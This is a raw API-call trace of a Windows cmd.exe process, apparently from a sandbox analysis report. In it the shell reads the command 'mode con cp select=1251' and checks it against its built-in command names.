TokenHandle=0x1bf790 | out: TokenHandle=0x1bf790*=0x0) returned 0xc000007c [0262.323] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x1bf790 | out: TokenHandle=0x1bf790*=0x50) returned 0x0 [0262.323] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x12, TokenInformation=0x1bf7a0, TokenInformationLength=0x4, ReturnLength=0x1bf7a8 | out: TokenInformation=0x1bf7a0, ReturnLength=0x1bf7a8) returned 0x0 [0262.323] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x1a, TokenInformation=0x1bf7a8, TokenInformationLength=0x4, ReturnLength=0x1bf7a0 | out: TokenInformation=0x1bf7a8, ReturnLength=0x1bf7a0) returned 0x0 [0262.323] NtClose (Handle=0x50) returned 0x0 [0262.323] GetProcessHeap () returned 0x280000 [0262.323] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29aae0 | out: hHeap=0x280000) returned 1 [0262.324] _vsnwprintf (in: _Buffer=0x4a0a6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1bf4a8 | out: _Buffer="\r\n") returned 2 [0262.324] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.324] GetFileType (hFile=0xf4) returned 0x3 [0262.324] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.324] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a09c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0262.324] WriteFile (in: hFile=0xf4, lpBuffer=0x4a09c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bf478, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesWritten=0x1bf478*=0x2, lpOverlapped=0x0) returned 1 [0262.324] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a08f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0262.324] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a09c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0262.324] _vsnwprintf (in: _Buffer=0x4a08eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1bf4b8 | out: _Buffer="C:\\Windows\\system32") returned 19 [0262.325] _vsnwprintf (in: _Buffer=0x4a08eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x1bf4b8 | out: _Buffer=">") returned 1 [0262.325] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.325] GetFileType (hFile=0xf4) returned 0x3 [0262.325] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.325] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4a09c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0262.325] WriteFile (in: hFile=0xf4, lpBuffer=0x4a09c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x1bf4a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesWritten=0x1bf4a8*=0x14, lpOverlapped=0x0) returned 1 [0262.325] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.325] GetFileType (hFile=0xe8) returned 0x3 [0262.325] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.325] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.325] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.325] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e320, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0262.325] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.325] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.325] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.325] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e322, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0262.325] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.325] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.325] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.325] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e324, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0262.325] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.325] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.325] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.325] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e326, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0262.326] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.326] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.326] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.326] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e328, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0262.326] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.326] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.326] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.326] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e32a, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0262.326] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.326] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.326] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.326] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e32c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0262.326] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.326] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.326] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.326] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e32e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0262.326] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.326] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.326] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.326] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e330, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0262.326] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.326] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.326] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.326] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e332, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0262.326] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.326] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.326] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.326] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e334, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0262.326] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.326] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.326] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.326] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e336, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0262.326] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.326] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.326] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.326] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e338, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0262.326] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.326] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.326] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.327] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e33a, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0262.327] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.327] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.327] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.327] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e33c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0262.327] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.327] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.327] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.327] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e33e, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0262.327] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.327] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.327] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.327] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e340, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0262.327] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.327] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.327] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.327] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e342, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0262.327] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.327] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.327] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.327] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e344, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0262.327] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.327] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.327] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.327] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e346, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0262.327] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.327] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.327] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.327] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e348, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0262.327] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.327] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.327] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.327] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e34a, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0262.327] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.327] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.327] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.327] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e34c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0262.327] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.327] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.327] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.328] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e34e, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0262.328] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.328] GetFileType (hFile=0xe8) returned 0x3 [0262.328] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.328] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.328] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.328] GetFileType (hFile=0xf4) returned 0x3 [0262.328] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.328] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mode con cp select=1251\n", cchWideChar=-1, lpMultiByteStr=0x4a09c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mode con cp select=1251\n", lpUsedDefaultChar=0x0) returned 25 [0262.328] WriteFile (in: hFile=0xf4, lpBuffer=0x4a09c320*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x1bf788, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesWritten=0x1bf788*=0x18, lpOverlapped=0x0) returned 1 [0262.328] GetProcessHeap () returned 0x280000 [0262.328] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4012) returned 0x29b310 [0262.328] GetProcessHeap () returned 0x280000 [0262.328] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29b310 | out: hHeap=0x280000) returned 1 [0262.329] _wcsicmp (_String1="mode", _String2=")") returned 68 [0262.329] _wcsicmp (_String1="FOR", _String2="mode") returned -7 [0262.329] _wcsicmp (_String1="FOR/?", _String2="mode") returned -7 [0262.329] _wcsicmp (_String1="IF", _String2="mode") returned -4 [0262.329] _wcsicmp (_String1="IF/?", _String2="mode") returned -4 [0262.329] _wcsicmp (_String1="REM", _String2="mode") returned 5 [0262.329] _wcsicmp (_String1="REM/?", _String2="mode") returned 5 [0262.329] GetProcessHeap () returned 0x280000 [0262.329] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb0) returned 0x299840 [0262.329] GetProcessHeap () returned 0x280000 [0262.329] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1a) returned 0x294630 [0262.329] GetProcessHeap () returned 0x280000 [0262.329] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x38) returned 0x296550 [0262.330] GetConsoleOutputCP () returned 0x1b5 [0262.461] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a09bfe0 | out: lpCPInfo=0x4a09bfe0) returned 1 [0262.461] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0262.461] GetConsoleTitleW (in: lpConsoleTitle=0x1bf740, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0262.461] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0262.461] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0262.462] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0262.462] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0262.462] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0262.462] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0262.462] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0262.462] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0262.462] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0262.462] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0262.462] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0262.462] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0262.462] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0262.462] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0262.462] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0262.462] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0262.462] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0262.462] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0262.462] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0262.462] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0262.462] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0262.462] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0262.462] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0262.462] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0262.462] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0262.462] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0262.462] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0262.462] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0262.462] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0262.462] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0262.462] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0262.462] _wcsicmp (_String1="mode", _String2="START") returned -6 [0262.462] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0262.462] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0262.462] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0262.462] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0262.462] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0262.462] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0262.462] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0262.462] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0262.463] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0262.463] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0262.463] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0262.463] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0262.463] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0262.463] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0262.463] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0262.463] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0262.463] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0262.463] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0262.463] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0262.463] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0262.463] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0262.463] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0262.463] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0262.463] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0262.463] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0262.463] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0262.463] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0262.463] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0262.463] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0262.463] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0262.463] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0262.463] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0262.463] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0262.463] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0262.463] 